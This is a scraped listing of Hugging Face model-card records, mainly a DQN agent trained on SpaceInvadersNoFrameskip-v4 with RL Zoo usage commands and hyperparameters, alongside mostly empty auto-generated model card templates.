Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
debisoft/SpaceInvadersNoFrameskip-v4
|
debisoft
| 2025-09-23T16:29:43Z | 138 | 0 |
stable-baselines3
|
[
"stable-baselines3",
"SpaceInvadersNoFrameskip-v4",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] |
reinforcement-learning
| 2025-09-22T00:22:26Z |
---
library_name: stable-baselines3
tags:
- SpaceInvadersNoFrameskip-v4
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: DQN
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: SpaceInvadersNoFrameskip-v4
type: SpaceInvadersNoFrameskip-v4
metrics:
- type: mean_reward
value: 709.00 +/- 231.90
name: mean_reward
verified: false
---
# **DQN** Agent playing **SpaceInvadersNoFrameskip-v4**
This is a trained model of a **DQN** agent playing **SpaceInvadersNoFrameskip-v4**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3)
and the [RL Zoo](https://github.com/DLR-RM/rl-baselines3-zoo).
The RL Zoo is a training framework for Stable Baselines3
reinforcement learning agents,
with hyperparameter optimization and pre-trained agents included.
## Usage (with SB3 RL Zoo)
RL Zoo: https://github.com/DLR-RM/rl-baselines3-zoo<br/>
SB3: https://github.com/DLR-RM/stable-baselines3<br/>
SB3 Contrib: https://github.com/Stable-Baselines-Team/stable-baselines3-contrib
SBX (SB3 + Jax): https://github.com/araffin/sbx
Install the RL Zoo (with SB3 and SB3-Contrib):
```bash
pip install rl_zoo3
```
```
# Download model and save it into the logs/ folder
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga debisoft -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
If you installed the RL Zoo3 via pip (`pip install rl_zoo3`), from anywhere you can do:
```
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga debisoft -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
## Training (with the RL Zoo)
```
python -m rl_zoo3.train --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
# Upload the model and generate video (when possible)
python -m rl_zoo3.push_to_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/ -orga debisoft
```
## Hyperparameters
```python
OrderedDict([('batch_size', 128),
('buffer_size', 250000),
('env_wrapper',
['stable_baselines3.common.atari_wrappers.AtariWrapper']),
('exploration_final_eps', 0.01),
('exploration_fraction', 0.1),
('frame_stack', 4),
('gradient_steps', 1),
('learning_rate', 0.0001),
('learning_starts', 100000),
('n_timesteps', 3000000.0),
('optimize_memory_usage', False),
('policy', 'CnnPolicy'),
('target_update_interval', 1000),
('train_freq', 4),
('normalize', False)])
```
# Environment Arguments
```python
{'render_mode': 'rgb_array'}
```
|
EurekaTian/qwen2p5_3b_mmlu_full
|
EurekaTian
| 2025-09-23T16:29:20Z | 0 | 0 | null |
[
"safetensors",
"qwen2",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T16:25:43Z |
---
license: apache-2.0
---
|
aamijar/Llama-2-13b-hf-lora-r8-boolq
|
aamijar
| 2025-09-23T16:28:47Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:28:44Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Subsets and Splits
Filtered Qwen2.5 Distill Models
Identifies specific configurations of models by filtering cards that contain 'distill', 'qwen2.5', '7b' while excluding certain base models and incorrect model ID patterns, uncovering unique model variants.
Filtered Model Cards Count
Finds the count of entries with specific card details that include 'distill', 'qwen2.5', '7b' but exclude certain base models, revealing valuable insights about the dataset's content distribution.
Filtered Distill Qwen 7B Models
Filters for specific card entries containing 'distill', 'qwen', and '7b', excluding certain strings and patterns, to identify relevant model configurations.
Filtered Qwen-7b Model Cards
The query performs a detailed filtering based on specific keywords and excludes certain entries, which could be useful for identifying a specific subset of cards but does not provide deeper insights or trends.
Filtered Qwen 7B Model Cards
The query filters for specific terms related to "distilled" or "distill", "qwen", and "7b" in the 'card' column but excludes certain base models, providing a limited set of entries for further inspection.
Qwen 7B Distilled Models
The query provides a basic filtering of records to find specific card names that include keywords related to distilled Qwen 7b models, excluding a particular base model, which gives limited insight but helps in focusing on relevant entries.
Qwen 7B Distilled Model Cards
The query filters data based on specific keywords in the modelId and card fields, providing limited insight primarily useful for locating specific entries rather than revealing broad patterns or trends.
Qwen 7B Distilled Models
Finds all entries containing the terms 'distilled', 'qwen', and '7b' in a case-insensitive manner, providing a filtered set of records but without deeper analysis.
Distilled Qwen 7B Models
The query filters for specific model IDs containing 'distilled', 'qwen', and '7b', providing a basic retrieval of relevant entries but without deeper analysis or insight.
Filtered Model Cards with Distill Qwen2.
Filters and retrieves records containing specific keywords in the card description while excluding certain phrases, providing a basic count of relevant entries.
Filtered Model Cards with Distill Qwen 7
The query filters specific variations of card descriptions containing 'distill', 'qwen', and '7b' while excluding a particular base model, providing limited but specific data retrieval.
Distill Qwen 7B Model Cards
The query filters and retrieves rows where the 'card' column contains specific keywords ('distill', 'qwen', and '7b'), providing a basic filter result that can help in identifying specific entries.